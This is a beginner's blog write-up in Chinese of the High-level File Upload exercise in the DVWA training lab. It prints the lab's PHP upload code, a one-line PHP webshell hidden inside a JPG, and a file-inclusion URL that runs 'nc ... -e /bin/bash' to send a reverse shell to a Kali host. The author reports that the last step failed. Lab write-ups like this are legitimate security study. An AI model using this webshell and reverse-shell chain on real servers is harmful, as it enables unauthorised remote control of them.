4.File Upload(High)——小白笔记——DVWA

0x01:High级别的DVWA测试

1.上源码
File Upload Source:

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?> 

//存储文件名的参数为filename
如上源码,进行的加固过滤有:
1.getimagesize()函数,获取图片大小是在抓包修改后进行验证的,所以这个不仅可以判断大小也能判断是否为图片(这个函数首先判断是否为图片,其次判断大小)

2.攻击演示:

1.使用copy,把一句话代码挂到真正的图片里面,并上传。		//发现上传成功

1.新建一个文本,输入内容,并保存为1.php
<?php system($_GET['pass']); ?>
2.截一个很小很小的图,重命名为1.jpg
3.在cmd里面,输入命令把php文件加入到图片中,生成High.jpg文件
copy  1.jpg/b+high.php/a  High.jpg

在这里插入图片描述

2.获得Webshell:
①打开kali,在终端内监听端口9999:nc  -l  9999			//注意是小写的L字母
②转到文件包含,在URL栏里输入:http://192.168.78.129/dvwa/vulnerabilities/fi/?page=file///var/www/html/hackable/uploads/High.jpg&&pass=nc 192.168.78.130 9999 -e /bin/bash				//130为kali的IP地址

在这里插入图片描述

//本应该会出现结果,但是不知道哪里错了。。。。。。
在这里插入图片描述

发布了94 篇原创文章 · 获赞 29 · 访问量 2967

猜你喜欢

转载自blog.csdn.net/qq_45555226/article/details/103093355